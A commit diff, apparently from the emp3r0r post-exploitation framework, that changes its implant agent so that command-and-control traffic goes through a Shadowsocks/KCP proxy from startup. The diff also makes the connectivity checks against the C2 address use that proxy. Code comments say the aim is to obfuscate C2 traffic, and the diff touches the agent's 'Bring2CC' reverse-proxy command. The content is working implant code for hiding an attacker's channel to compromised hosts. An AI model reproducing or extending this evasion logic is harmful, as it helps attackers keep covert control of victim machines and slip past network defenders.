fix: some traffic bypasses shadowsocks/kcp proxy

jm33-m0 · Oct 24, 2024 · a45b14c · a45b14c
1 parent cc1a172
commit a45b14c
Show file tree

Hide file tree

Showing 5 changed files with 17 additions and 16 deletions.
diff --git a/core/cmd/agent/main.go b/core/cmd/agent/main.go
@@ -312,6 +312,17 @@ test_agent:
 		}
 	}
 
+	// enable shadowsocks / kcp
+	if agent.RuntimeConfig.UseShadowsocks {
+		// since we are Internet-facing, we can use Shadowsocks proxy to obfuscate our C2 traffic a bit
+		agent.RuntimeConfig.C2TransportProxy = fmt.Sprintf("socks5://127.0.0.1:%s",
+			agent.RuntimeConfig.ShadowsocksPort)
+
+		// run ss w/wo KCP
+		go agent.ShadowsocksC2Client()
+		go agent.KCPClient() // KCP client will run when UseKCP is set
+	}
+
 	// do we have internet?
 	checkInternet := func(cnt *int) bool {
 		if isC2Reachable() {
@@ -320,16 +331,6 @@ test_agent:
 				log.Println("[+] It seems that we have internet access, let's start a socks5 proxy to help others")
 				ctx, cancel := context.WithCancel(context.Background())
 				go agent.StartBroadcast(true, ctx, cancel) // auto-proxy feature
-
-				if agent.RuntimeConfig.UseShadowsocks {
-					// since we are Internet-facing, we can use Shadowsocks proxy to obfuscate our C2 traffic a bit
-					agent.RuntimeConfig.C2TransportProxy = fmt.Sprintf("socks5://127.0.0.1:%s",
-						agent.RuntimeConfig.ShadowsocksPort)
-
-					// run ss w/wo KCP
-					go agent.ShadowsocksC2Client()
-					go agent.KCPClient() // KCP client will run when UseKCP is set
-				}
 			}
 			return true
 

diff --git a/core/cmd/agent/util.go b/core/cmd/agent/util.go
@@ -24,11 +24,11 @@ func isAgentAlive() bool {
 
 func isC2Reachable() bool {
 	if !agent.RuntimeConfig.DisableNCSI {
-		return tun.HasInternetAccess(tun.UbuntuConnectivityURL)
+		return tun.HasInternetAccess(tun.UbuntuConnectivityURL, agent.RuntimeConfig.C2TransportProxy)
 	}
 
 	log.Println("NCSI is disabled, trying direct C2 connection")
-	return tun.HasInternetAccess(emp3r0r_data.CCAddress)
+	return tun.HasInternetAccess(emp3r0r_data.CCAddress, agent.RuntimeConfig.C2TransportProxy)
 }
 
 // handle connections to our socket: tell them my PID

diff --git a/core/lib/agent/c2cmds.go b/core/lib/agent/c2cmds.go
@@ -56,7 +56,7 @@ func C2CommandsHandler(cmdSlice []string) (out string) {
 		addr := cmdSlice[1]
 		out = "Bring2CC: Reverse proxy for " + addr + " finished"
 
-		hasInternet := tun.HasInternetAccess(emp3r0r_data.CCAddress)
+		hasInternet := tun.HasInternetAccess(emp3r0r_data.CCAddress, RuntimeConfig.C2TransportProxy)
 		isProxyOK := tun.IsProxyOK(RuntimeConfig.C2TransportProxy, emp3r0r_data.CCAddress)
 		if !hasInternet && !isProxyOK {
 			out = "Error: We don't have any internet to share"

diff --git a/core/lib/agent/util.go b/core/lib/agent/util.go
@@ -129,7 +129,7 @@ func CollectSystemInfo() *emp3r0r_data.AgentSystemInfo {
 	info.HasTor = tun.IsTor(emp3r0r_data.CCAddress)
 
 	// has internet?
-	info.HasInternet = tun.HasInternetAccess(tun.UbuntuConnectivityURL)
+	info.HasInternet = tun.HasInternetAccess(tun.UbuntuConnectivityURL, RuntimeConfig.C2TransportProxy)
 
 	// IP address?
 	info.IPs = tun.IPa()

diff --git a/core/lib/tun/netutil.go b/core/lib/tun/netutil.go
@@ -67,7 +67,7 @@ func IsTor(addr string) bool {
 
 // HasInternetAccess does this machine has internet access,
 // does NOT use any proxies
-func HasInternetAccess(test_url string) bool {
+func HasInternetAccess(test_url, proxy string) bool {
 	// use Microsoft NCSI as default
 	// NCSI is an HTTP service therefore we don't need
 	// uTLS to talk to it
@@ -76,7 +76,7 @@ func HasInternetAccess(test_url string) bool {
 	}
 	// if not using Microsoft NCSI, we need to use uTLS
 	if test_url != MicrosoftNCSIURL {
-		client = HTTPClientWithEmpCA(test_url, "")
+		client = HTTPClientWithEmpCA(test_url, proxy)
 		if client == nil {
 			log.Printf("HasInternetAccess: cannot create http client for %s", test_url)
 			return false